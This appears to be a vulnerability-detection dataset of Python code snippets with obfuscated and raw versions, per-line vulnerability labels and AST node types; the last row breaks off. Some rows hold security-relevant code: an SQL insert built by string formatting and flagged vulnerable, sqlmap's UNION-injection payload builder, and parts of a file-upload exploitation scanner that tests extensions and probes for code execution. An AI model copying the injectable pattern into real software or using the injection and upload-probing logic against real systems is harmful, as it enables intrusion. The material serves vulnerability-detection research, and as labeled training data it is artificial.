lines (sequence, lengths 1–444) | raw_lines (sequence, lengths 1–444) | label (sequence, lengths 1–444) | type (sequence, lengths 1–444)
---|---|---|---|
[
"def FUNC_2(self, VAR_0):...\n",
"for s in VAR_0:\n",
"self.oms_ssh.characterReceived(s, False)\n"
] | [
"def _input(self, string):...\n",
"for s in string:\n",
"self.oms_ssh.characterReceived(s, False)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"For",
"Expr'"
] |
[
"def FUNC_4(VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"if not VAR_3.headers.get('Authorization'):\n",
"return None\n",
"if not utils.is_local_dev_server():\n",
"return api.extract_oauth_caller_identity()\n",
"VAR_32 = VAR_3.headers['Authorization'].split(' ', 1)\n",
"if len(VAR_32) != 2 or VAR_32[0] not in ('OAuth', 'Bearer'):\n",
"VAR_33 = 'https://www.googleapis.com/oauth2/v1/tokeninfo'\n",
"VAR_34 = urlfetch.fetch(url='%s?%s' % (base_url, urllib.urlencode({\n 'access_token': header[1]})), follow_redirects=False,\n validate_certificate=True)\n",
"if VAR_34.status_code != 200:\n",
"VAR_35 = json.loads(VAR_34.content)\n",
"VAR_22 = json.loads(VAR_34.content)['error_description']\n",
"VAR_22 = repr(VAR_34.content)\n",
"if 'email' not in VAR_35:\n",
"if not VAR_35.get('verified_email'):\n",
"VAR_36 = VAR_35['email']\n",
"return model.Identity(model.IDENTITY_USER, VAR_36)\n"
] | [
"def oauth_authentication(request):...\n",
"\"\"\"docstring\"\"\"\n",
"if not request.headers.get('Authorization'):\n",
"return None\n",
"if not utils.is_local_dev_server():\n",
"return api.extract_oauth_caller_identity()\n",
"header = request.headers['Authorization'].split(' ', 1)\n",
"if len(header) != 2 or header[0] not in ('OAuth', 'Bearer'):\n",
"base_url = 'https://www.googleapis.com/oauth2/v1/tokeninfo'\n",
"result = urlfetch.fetch(url='%s?%s' % (base_url, urllib.urlencode({\n 'access_token': header[1]})), follow_redirects=False,\n validate_certificate=True)\n",
"if result.status_code != 200:\n",
"token_info = json.loads(result.content)\n",
"error = json.loads(result.content)['error_description']\n",
"error = repr(result.content)\n",
"if 'email' not in token_info:\n",
"if not token_info.get('verified_email'):\n",
"email = token_info['email']\n",
"return model.Identity(model.IDENTITY_USER, email)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Condition",
"Return'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Return'"
] |
[
"def FUNC_21(self, VAR_1):...\n",
"VAR_16 = [VAR_25.fieldname for VAR_25 in self.meta.get_table_fields() if \n VAR_25.options == VAR_1]\n",
"return VAR_16[0] if VAR_16 else None\n"
] | [
"def get_parentfield_of_doctype(self, doctype):...\n",
"fieldname = [df.fieldname for df in self.meta.get_table_fields() if df.\n options == doctype]\n",
"return fieldname[0] if fieldname else None\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Return'"
] |
[
"def FUNC_21(self):...\n",
"self.run_test_case(self.scenario.list_available_images())\n"
] | [
"def test_available_images(self):...\n",
"self.run_test_case(self.scenario.list_available_images())\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_1(VAR_4):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_6 = 'string' % (', '.join(VAR_1.keys()), VAR_4)\n",
"if not isinstance(VAR_4, (str, list)):\n",
"if VAR_4 != 'all' and not set(VAR_1.keys()).issuperset(VAR_4):\n",
"VAR_4 = list(VAR_1.keys()) if VAR_4 == 'all' else VAR_4[:]\n",
"return VAR_4\n"
] | [
"def check_leagues_ids(leagues_ids):...\n",
"\"\"\"docstring\"\"\"\n",
"leagues_ids_error_msg = (\n 'Parameter `leagues_ids` should be equal to `all` or a list that contains any of %s elements. Got %s instead.'\n % (', '.join(LEAGUES_MAPPING.keys()), leagues_ids))\n",
"if not isinstance(leagues_ids, (str, list)):\n",
"if leagues_ids != 'all' and not set(LEAGUES_MAPPING.keys()).issuperset(\n",
"leagues_ids = list(LEAGUES_MAPPING.keys()\n ) if leagues_ids == 'all' else leagues_ids[:]\n",
"return leagues_ids\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Condition",
"Assign'",
"Return'"
] |
[
"import json\n",
"import psycopg2\n",
"VAR_0 = \"INSERT INTO %s(data) VALUES('%s') RETURNING id\"\n",
"VAR_1 = 'SELECT %s FROM %s WHERE %s'\n",
"VAR_2 = 'SELECT * FROM %s WHERE id=%s'\n",
"def __init__(self, VAR_3, VAR_4):...\n",
"self.name = VAR_3\n",
"self.connection = VAR_4\n",
"self.cursor = self.connection.cursor()\n",
"def FUNC_0(self):...\n",
"self.connection.commit()\n",
"def FUNC_1(self, VAR_5):...\n",
"self.cursor.execute(self.SQL_INSERT_JSON % (self.name, json.dumps(VAR_5)))\n",
"return self.cursor.fetchone()[0]\n"
] | [
"import json\n",
"import psycopg2\n",
"SQL_INSERT_JSON = \"INSERT INTO %s(data) VALUES('%s') RETURNING id\"\n",
"SQL_QUERY_JSON = 'SELECT %s FROM %s WHERE %s'\n",
"SQL_GET_JSON = 'SELECT * FROM %s WHERE id=%s'\n",
"def __init__(self, name, connection):...\n",
"self.name = name\n",
"self.connection = connection\n",
"self.cursor = self.connection.cursor()\n",
"def commit(self):...\n",
"self.connection.commit()\n",
"def put(self, data):...\n",
"self.cursor.execute(self.SQL_INSERT_JSON % (self.name, json.dumps(data)))\n",
"return self.cursor.fetchone()[0]\n"
] | [
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
4,
0
] | [
"Import'",
"Import'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"FunctionDef'",
"Expr'",
"FunctionDef'",
"Expr'",
"Return'"
] |
[
"@classmethod...\n",
"return [FUNC_27, FUNC_28]\n"
] | [
"@classmethod...\n",
"return [not_applicable, applicable]\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_3(self, VAR_14):...\n",
"if not self.stopThreads:\n",
"VAR_13 = VAR_14.result()[0].text\n",
"return None\n",
"VAR_37 = VAR_14.ext[0]\n",
"VAR_28 = self.isASuccessfulUpload(VAR_13)\n",
"if VAR_28:\n",
"self.validExtensions.append(VAR_37)\n",
"return VAR_28\n",
"if self.shouldLog:\n",
"self.logger.info('\\x1b[1m\\x1b[42mExtension %s seems valid for this form.\\x1b[m'\n , VAR_37)\n",
"if VAR_28 != True:\n",
"self.logger.info(\n '\\x1b[1;32mTrue regex matched the following information : %s\\x1b[m', VAR_28\n )\n"
] | [
"def detectValidExtension(self, future):...\n",
"if not self.stopThreads:\n",
"html = future.result()[0].text\n",
"return None\n",
"ext = future.ext[0]\n",
"r = self.isASuccessfulUpload(html)\n",
"if r:\n",
"self.validExtensions.append(ext)\n",
"return r\n",
"if self.shouldLog:\n",
"self.logger.info('\\x1b[1m\\x1b[42mExtension %s seems valid for this form.\\x1b[m'\n , ext)\n",
"if r != True:\n",
"self.logger.info(\n '\\x1b[1;32mTrue regex matched the following information : %s\\x1b[m', r)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Return'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Return'",
"Condition",
"Expr'",
"Condition",
"Expr'"
] |
[
"\"\"\"string\"\"\"\n",
"from lib.core.agent import agent\n",
"from lib.core.data import conf\n",
"from lib.core.data import kb\n",
"from lib.core.data import logger\n",
"from lib.core.data import queries\n",
"from lib.core.session import setUnion\n",
"from lib.request.connect import Connect as Request\n",
"def FUNC_0(VAR_0, VAR_1):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_2 = {}\n",
"for count in range(0, 50):\n",
"if kb.dbms == 'Oracle' and VAR_0.endswith(' FROM DUAL'):\n",
"return None\n",
"VAR_0 = VAR_0[:-len(' FROM DUAL')]\n",
"if count:\n",
"VAR_0 += ', NULL'\n",
"if kb.dbms == 'Oracle':\n",
"VAR_0 += ' FROM DUAL'\n",
"VAR_5 = agent.postfixQuery(VAR_0, VAR_1)\n",
"VAR_6 = agent.payload(newValue=commentedQuery)\n",
"VAR_7 = Request.queryPage(VAR_6)\n",
"if not VAR_7 in VAR_2.keys():\n",
"VAR_2[VAR_7] = 1, VAR_5\n",
"VAR_2[VAR_7] = VAR_2[VAR_7][0] + 1, VAR_5\n",
"if count:\n",
"for element in VAR_2.values():\n",
"if element[0] == 1:\n",
"if kb.injPlace == 'GET':\n",
"VAR_4 = '%s?%s' % (conf.url, VAR_6)\n",
"if kb.injPlace == 'POST':\n",
"return VAR_4\n",
"VAR_4 = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'Cookie':\n",
"VAR_4 += \"\\nPOST:\\t'%s'\\n\" % VAR_6\n",
"VAR_4 = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'User-Agent':\n",
"VAR_4 += \"\\nCookie:\\t'%s'\\n\" % VAR_6\n",
"VAR_4 = \"URL:\\t\\t'%s'\" % conf.url\n",
"VAR_4 += \"\"\"\nUser-Agent:\t'%s'\n\"\"\" % VAR_6\n"
] | [
"\"\"\"\n$Id$\n\nThis file is part of the sqlmap project, http://sqlmap.sourceforge.net.\n\nCopyright (c) 2006-2008 Bernardo Damele A. G. <[email protected]>\n and Daniele Bellucci <[email protected]>\n\nsqlmap is free software; you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free\nSoftware Foundation version 2 of the License.\n\nsqlmap is distributed in the hope that it will be useful, but WITHOUT ANY\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more\ndetails.\n\nYou should have received a copy of the GNU General Public License along\nwith sqlmap; if not, write to the Free Software Foundation, Inc., 51\nFranklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\"\"\"\n",
"from lib.core.agent import agent\n",
"from lib.core.data import conf\n",
"from lib.core.data import kb\n",
"from lib.core.data import logger\n",
"from lib.core.data import queries\n",
"from lib.core.session import setUnion\n",
"from lib.request.connect import Connect as Request\n",
"def __effectiveUnionTest(query, comment):...\n",
"\"\"\"docstring\"\"\"\n",
"resultDict = {}\n",
"for count in range(0, 50):\n",
"if kb.dbms == 'Oracle' and query.endswith(' FROM DUAL'):\n",
"return None\n",
"query = query[:-len(' FROM DUAL')]\n",
"if count:\n",
"query += ', NULL'\n",
"if kb.dbms == 'Oracle':\n",
"query += ' FROM DUAL'\n",
"commentedQuery = agent.postfixQuery(query, comment)\n",
"payload = agent.payload(newValue=commentedQuery)\n",
"newResult = Request.queryPage(payload)\n",
"if not newResult in resultDict.keys():\n",
"resultDict[newResult] = 1, commentedQuery\n",
"resultDict[newResult] = resultDict[newResult][0] + 1, commentedQuery\n",
"if count:\n",
"for element in resultDict.values():\n",
"if element[0] == 1:\n",
"if kb.injPlace == 'GET':\n",
"value = '%s?%s' % (conf.url, payload)\n",
"if kb.injPlace == 'POST':\n",
"return value\n",
"value = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'Cookie':\n",
"value += \"\\nPOST:\\t'%s'\\n\" % payload\n",
"value = \"URL:\\t'%s'\" % conf.url\n",
"if kb.injPlace == 'User-Agent':\n",
"value += \"\\nCookie:\\t'%s'\\n\" % payload\n",
"value = \"URL:\\t\\t'%s'\" % conf.url\n",
"value += \"\"\"\nUser-Agent:\t'%s'\n\"\"\" % payload\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
2,
0,
0,
0,
0,
0,
2,
0,
0,
0,
0,
2,
2,
0,
2,
0,
0,
0,
0,
2,
0,
0,
2,
0,
2
] | [
"Expr'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Assign'",
"For",
"Condition",
"Return'",
"Assign'",
"Condition",
"AugAssign'",
"Condition",
"AugAssign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"For",
"Condition",
"Condition",
"Assign'",
"Condition",
"Return'",
"Assign'",
"Condition",
"AugAssign'",
"Assign'",
"Condition",
"AugAssign'",
"Assign'",
"AugAssign'"
] |
[
"def FUNC_7(self, VAR_9):...\n",
"for VAR_6 in self.clients:\n",
"if VAR_6 not in VAR_9:\n",
"self.close_client(VAR_6)\n"
] | [
"def update_client_status(self, active_set):...\n",
"for language in self.clients:\n",
"if language not in active_set:\n",
"self.close_client(language)\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Condition",
"Expr'"
] |
[
"def FUNC_0():...\n",
"return BuildFileAliases(targets={PythonApp.alias(): PythonApp, PythonBinary\n .alias(): PythonBinary, PythonLibrary.alias(): PythonLibrary,\n PythonTests.alias(): PythonTests, PythonDistribution.alias():\n PythonDistribution, 'python_requirement_library':\n PythonRequirementLibrary, Resources.alias(): Resources, UnpackedWheels.\n alias(): UnpackedWheels}, objects={'python_requirement':\n PythonRequirement, 'python_artifact': PythonArtifact, 'setup_py':\n PythonArtifact}, context_aware_object_factories={'python_requirements':\n PythonRequirements, PantsRequirement.alias: PantsRequirement})\n"
] | [
"def build_file_aliases():...\n",
"return BuildFileAliases(targets={PythonApp.alias(): PythonApp, PythonBinary\n .alias(): PythonBinary, PythonLibrary.alias(): PythonLibrary,\n PythonTests.alias(): PythonTests, PythonDistribution.alias():\n PythonDistribution, 'python_requirement_library':\n PythonRequirementLibrary, Resources.alias(): Resources, UnpackedWheels.\n alias(): UnpackedWheels}, objects={'python_requirement':\n PythonRequirement, 'python_artifact': PythonArtifact, 'setup_py':\n PythonArtifact}, context_aware_object_factories={'python_requirements':\n PythonRequirements, PantsRequirement.alias: PantsRequirement})\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_6(self, VAR_29):...\n",
"if VAR_29 is None:\n",
"return VAR_101.user.pref_numsites\n",
"return VAR_54(VAR_55(int(VAR_29), 1), 250)\n"
] | [
"def run(self, limit):...\n",
"if limit is None:\n",
"return c.user.pref_numsites\n",
"return min(max(int(limit), 1), 250)\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"import hashlib\n",
"import inspect\n",
"import logging\n",
"import os\n",
"import re\n",
"import sys\n",
"import tempfile\n",
"import csv\n",
"import gzip\n",
"from datetime import datetime\n",
"from time import time\n",
"from io import StringIO\n",
"from sqlalchemy import event\n",
"from sqlalchemy.engine import Engine\n",
"from sqlalchemy.schema import DropTable\n",
"from sqlalchemy.ext.compiler import compiles\n",
"import pandas\n",
"import sqlalchemy\n",
"import lore\n",
"from lore.util import timer\n",
"from lore.stores import query_cached\n",
"VAR_0 = logging.getLogger(__name__)\n",
"@compiles(DropTable, 'postgresql')...\n",
"return VAR_2.visit_drop_table(VAR_1) + ' CASCADE'\n"
] | [
"import hashlib\n",
"import inspect\n",
"import logging\n",
"import os\n",
"import re\n",
"import sys\n",
"import tempfile\n",
"import csv\n",
"import gzip\n",
"from datetime import datetime\n",
"from time import time\n",
"from io import StringIO\n",
"from sqlalchemy import event\n",
"from sqlalchemy.engine import Engine\n",
"from sqlalchemy.schema import DropTable\n",
"from sqlalchemy.ext.compiler import compiles\n",
"import pandas\n",
"import sqlalchemy\n",
"import lore\n",
"from lore.util import timer\n",
"from lore.stores import query_cached\n",
"logger = logging.getLogger(__name__)\n",
"@compiles(DropTable, 'postgresql')...\n",
"return compiler.visit_drop_table(element) + ' CASCADE'\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"Assign'",
"Condition",
"Return'"
] |
[
"def FUNC_16(self, VAR_27, VAR_6, VAR_28):...\n",
"self.host_list.append(VAR_28)\n",
"self.logger.debug('Saving component to tmp')\n",
"VAR_48 = '%s/%s.yaml' % (VAR_2, VAR_6)\n",
"FUNC_10(VAR_48)\n",
"dump(VAR_27, outfile, default_flow_style=False)\n",
"self.logger.debug('Copying component \"%s\" to remote host \"%s\"' % (VAR_6,\n VAR_28))\n",
"VAR_12 = \"ssh %s 'mkdir -p %s' & scp %s %s:%s/%s.yaml\" % (VAR_28, VAR_1,\n VAR_48, VAR_28, VAR_1, VAR_6)\n",
"self.logger.debug(VAR_12)\n",
"FUNC_7(self.session, VAR_12)\n"
] | [
"def copy_component_to_remote(self, infile, comp, host):...\n",
"self.host_list.append(host)\n",
"self.logger.debug('Saving component to tmp')\n",
"tmp_comp_path = '%s/%s.yaml' % (TMP_COMP_DIR, comp)\n",
"ensure_dir(tmp_comp_path)\n",
"dump(infile, outfile, default_flow_style=False)\n",
"self.logger.debug('Copying component \"%s\" to remote host \"%s\"' % (comp, host))\n",
"cmd = \"ssh %s 'mkdir -p %s' & scp %s %s:%s/%s.yaml\" % (host, TMP_SLAVE_DIR,\n tmp_comp_path, host, TMP_SLAVE_DIR, comp)\n",
"self.logger.debug(cmd)\n",
"send_main_session_command(self.session, cmd)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_14(self, VAR_17, VAR_18, VAR_19, VAR_20):...\n",
"if VAR_18 == 'CP':\n",
"self.command(' '.join(['arm', 'mrc', str(self.targets[VAR_18]['registers'][\n VAR_17]['CP']), str(self.targets[VAR_18]['registers'][VAR_17]['Op1']),\n str(self.targets[VAR_18]['registers'][VAR_17]['CRn']), str(self.targets\n [VAR_18]['registers'][VAR_17]['CRm']), str(self.targets[VAR_18][\n 'registers'][VAR_17]['Op2']), VAR_20]), VAR_11=\n 'Error setting register value')\n",
"self.command('reg ' + VAR_17 + ' ' + VAR_20, VAR_11=\n 'Error setting register value')\n"
] | [
"def set_register_value(self, register, target, target_index, value):...\n",
"if target == 'CP':\n",
"self.command(' '.join(['arm', 'mrc', str(self.targets[target]['registers'][\n register]['CP']), str(self.targets[target]['registers'][register]['Op1'\n ]), str(self.targets[target]['registers'][register]['CRn']), str(self.\n targets[target]['registers'][register]['CRm']), str(self.targets[target\n ]['registers'][register]['Op2']), value]), error_message=\n 'Error setting register value')\n",
"self.command('reg ' + register + ' ' + value, error_message=\n 'Error setting register value')\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Expr'",
"Expr'"
] |
[
"def FUNC_14(self):...\n",
"return redirect(flask.url_for('goodbye'))\n"
] | [
"def redirect_to_goodbye(self):...\n",
"return redirect(flask.url_for('goodbye'))\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_0(VAR_6):...\n",
"if call(VAR_6['cmd'][1]['check'], shell=True) == 0:\n",
"return True\n",
"return False\n"
] | [
"def run_component_check(comp):...\n",
"if call(comp['cmd'][1]['check'], shell=True) == 0:\n",
"return True\n",
"return False\n"
] | [
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_7(self):...\n",
"self.assert404(self.client.get(url_for('oauthclient.authorized', remote_app\n ='invalid')))\n",
"self.assert404(self.client.get(url_for('oauthclient.disconnect', remote_app\n ='invalid')))\n"
] | [
"def test_no_remote_app(self):...\n",
"self.assert404(self.client.get(url_for('oauthclient.authorized', remote_app\n ='invalid')))\n",
"self.assert404(self.client.get(url_for('oauthclient.disconnect', remote_app\n ='invalid')))\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Expr'",
"Expr'"
] |
[
"def FUNC_4(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_7 = logging.getLogger(__name__)\n",
"VAR_7.setLevel(logging.DEBUG)\n",
"VAR_7.debug('Started run funtion')\n",
"while not self.end:\n",
"VAR_10 = []\n",
"VAR_11 = []\n",
"VAR_12 = {}\n",
"while not self.job_queue.empty():\n",
"VAR_13 = self.job_queue.get()\n",
"VAR_11.extend(VAR_10)\n",
"if isinstance(VAR_13, CLASS_3):\n",
"for VAR_13 in VAR_11:\n",
"VAR_11.append(VAR_13)\n",
"if isinstance(VAR_13, CLASS_0) and VAR_13.comp_name not in VAR_12:\n",
"VAR_7.debug(VAR_13.info())\n",
"time.sleep(1)\n",
"VAR_10.append(VAR_13)\n",
"VAR_14 = VAR_13.run_check()\n",
"VAR_12[VAR_13.comp_name] = True\n",
"if VAR_14 is True:\n",
"VAR_7.debug(\"S'all good man\")\n",
"VAR_7.debug('Check failed, notifying subscribers')\n",
"self.job_queue.put(VAR_13)\n",
"for subscriber in self.subscribed_queues:\n",
"subscriber.put(VAR_14)\n"
] | [
"def run(self):...\n",
"\"\"\"docstring\"\"\"\n",
"logger = logging.getLogger(__name__)\n",
"logger.setLevel(logging.DEBUG)\n",
"logger.debug('Started run funtion')\n",
"while not self.end:\n",
"comp_jobs = []\n",
"jobs = []\n",
"already_handleled = {}\n",
"while not self.job_queue.empty():\n",
"mon_job = self.job_queue.get()\n",
"jobs.extend(comp_jobs)\n",
"if isinstance(mon_job, HostMonitorJob):\n",
"for mon_job in jobs:\n",
"jobs.append(mon_job)\n",
"if isinstance(mon_job, ComponentMonitorJob\n",
"logger.debug(mon_job.info())\n",
"time.sleep(1)\n",
"comp_jobs.append(mon_job)\n",
"ret = mon_job.run_check()\n",
"already_handleled[mon_job.comp_name] = True\n",
"if ret is True:\n",
"logger.debug(\"S'all good man\")\n",
"logger.debug('Check failed, notifying subscribers')\n",
"self.job_queue.put(mon_job)\n",
"for subscriber in self.subscribed_queues:\n",
"subscriber.put(ret)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Expr'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Expr'",
"Condition",
"For",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Expr'",
"For",
"Expr'"
] |
[
"def FUNC_1(VAR_0, VAR_1):...\n",
""
] | [
"def render_recursive(request, depth):...\n",
""
] | [
0,
0
] | [
"FunctionDef'",
"Condition"
] |
[
"def FUNC_5(self, VAR_21):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_24 = self.getfile(VAR_21, VAR_23=False)\n",
"if VAR_24 is not False:\n",
"return True\n"
] | [
"def lexists(self, path):...\n",
"\"\"\"docstring\"\"\"\n",
"f = self.getfile(path, follow_symlinks=False)\n",
"if f is not False:\n",
"return True\n"
] | [
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Condition",
"Return'"
] |
[
"import re\n",
"from flask import request\n",
"\"\"\"\n Stack data structure will not insert\n equal sequential data\n \"\"\"\n",
"def __init__(self, VAR_1=None, VAR_2=5):...\n",
"self.size = VAR_2\n",
"self.data = VAR_1 or []\n",
"def FUNC_5(self, VAR_3):...\n",
"if self.data:\n",
"if VAR_3 != self.data[len(self.data) - 1]:\n",
"self.data.append(VAR_3)\n",
"self.data.append(VAR_3)\n",
"if len(self.data) > self.size:\n",
"self.data.pop(0)\n",
"def FUNC_6(self):...\n",
"if len(self.data) == 0:\n",
"return None\n",
"return self.data.pop(len(self.data) - 1)\n"
] | [
"import re\n",
"from flask import request\n",
"\"\"\"\n Stack data structure will not insert\n equal sequential data\n \"\"\"\n",
"def __init__(self, list=None, size=5):...\n",
"self.size = size\n",
"self.data = list or []\n",
"def push(self, item):...\n",
"if self.data:\n",
"if item != self.data[len(self.data) - 1]:\n",
"self.data.append(item)\n",
"self.data.append(item)\n",
"if len(self.data) > self.size:\n",
"self.data.pop(0)\n",
"def pop(self):...\n",
"if len(self.data) == 0:\n",
"return None\n",
"return self.data.pop(len(self.data) - 1)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Import'",
"ImportFrom'",
"Expr'",
"FunctionDef'",
"Assign'",
"Assign'",
"FunctionDef'",
"Condition",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Expr'",
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def __init__(self, VAR_18, VAR_35=10000, **VAR_16):...\n",
"CLASS_17.__init__(self, VAR_18, VAR_35=length, VAR_36=errors.NO_MSG_BODY, **kw)\n"
] | [
"def __init__(self, item, length=10000, **kw):...\n",
"VLength.__init__(self, item, length=length, empty_error=errors.NO_MSG_BODY,\n **kw)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_1(self, VAR_3):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_4 = '/api/keys'\n",
"VAR_5 = {'id': '[email protected]', 'public': VAR_3}\n",
"VAR_6 = self.client.post(VAR_4, json.dumps(VAR_5), content_type=\n 'application/json')\n",
"self.assertEqual(VAR_6.status_code, 201)\n",
"VAR_7 = VAR_6.data['id']\n",
"VAR_6 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_6.status_code, 200)\n",
"self.assertEqual(len(VAR_6.data['results']), 1)\n",
"VAR_4 = '/api/keys/{key_id}'.format(**locals())\n",
"VAR_6 = self.client.get(VAR_4)\n",
"self.assertEqual(VAR_6.status_code, 200)\n",
"self.assertEqual(VAR_5['id'], VAR_6.data['id'])\n",
"self.assertEqual(VAR_5['public'], VAR_6.data['public'])\n",
"VAR_6 = self.client.delete(VAR_4)\n",
"self.assertEqual(VAR_6.status_code, 204)\n"
] | [
"def _check_key(self, pubkey):...\n",
"\"\"\"docstring\"\"\"\n",
"url = '/api/keys'\n",
"body = {'id': '[email protected]', 'public': pubkey}\n",
"response = self.client.post(url, json.dumps(body), content_type=\n 'application/json')\n",
"self.assertEqual(response.status_code, 201)\n",
"key_id = response.data['id']\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(len(response.data['results']), 1)\n",
"url = '/api/keys/{key_id}'.format(**locals())\n",
"response = self.client.get(url)\n",
"self.assertEqual(response.status_code, 200)\n",
"self.assertEqual(body['id'], response.data['id'])\n",
"self.assertEqual(body['public'], response.data['public'])\n",
"response = self.client.delete(url)\n",
"self.assertEqual(response.status_code, 204)\n"
] | [
0,
0,
0,
0,
5,
0,
0,
5,
0,
0,
0,
0,
0,
0,
0,
5,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Assign'",
"Expr'"
] |
[
"def FUNC_22(self, VAR_6):...\n",
"VAR_49 = self.nodes.get(VAR_6['name'])\n",
"VAR_50 = []\n",
"VAR_51 = []\n",
"dep_resolve(VAR_49, VAR_50, VAR_51)\n",
"VAR_50.remove(VAR_49)\n",
"return VAR_50\n"
] | [
"def get_dep_list(self, comp):...\n",
"node = self.nodes.get(comp['name'])\n",
"res = []\n",
"unres = []\n",
"dep_resolve(node, res, unres)\n",
"res.remove(node)\n",
"return res\n"
] | [
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Return'"
] |
[
"def FUNC_15(self):...\n",
"VAR_12 = Client()\n",
"self.response = VAR_12.get(reverse('root-redirect'))\n",
"return self\n"
] | [
"def when_call_root_redirect(self):...\n",
"client = Client()\n",
"self.response = client.get(reverse('root-redirect'))\n",
"return self\n"
] | [
0,
0,
6,
0
] | [
"FunctionDef'",
"Assign'",
"Assign'",
"Return'"
] |
[
"def FUNC_6(self, VAR_10, VAR_11, VAR_12=None, VAR_20=None):...\n",
"VAR_30 = self.uploadFile(VAR_10, VAR_11, VAR_12)\n",
"VAR_31 = self.isASuccessfulUpload(VAR_30[0].text)\n",
"VAR_23 = {'uploaded': False, 'codeExec': False}\n",
"if VAR_31:\n",
"VAR_23['uploaded'] = True\n",
"return VAR_23\n",
"if self.shouldLog:\n",
"self.logger.info(\"\\x1b[1;32mUpload of '%s' with mime type %s successful\\x1b[m\",\n VAR_30[1], VAR_11)\n",
"if VAR_31 != True:\n",
"if self.shouldLog:\n",
"if VAR_20 and valid_regex(VAR_20) and (self.uploadsFolder or self.trueRegex):\n",
"self.logger.info(\n '\\x1b[1;32m\\tTrue regex matched the following information : %s\\x1b[m',\n VAR_31)\n",
"VAR_18 = None\n",
"VAR_41 = None\n",
"if self.uploadsFolder:\n",
"VAR_18 = (self.schema + '://' + self.host + '/' + self.uploadsFolder + '/' +\n VAR_30[1])\n",
"if self.codeExecUrlPattern:\n",
"VAR_35 = VAR_30[1]\n",
"VAR_18 = self.codeExecUrlPattern.replace('$captGroup$', VAR_31)\n",
"if VAR_18:\n",
"VAR_41 = None\n",
"VAR_48 = self.detectCodeExec(VAR_18, VAR_20)\n",
"if VAR_41:\n",
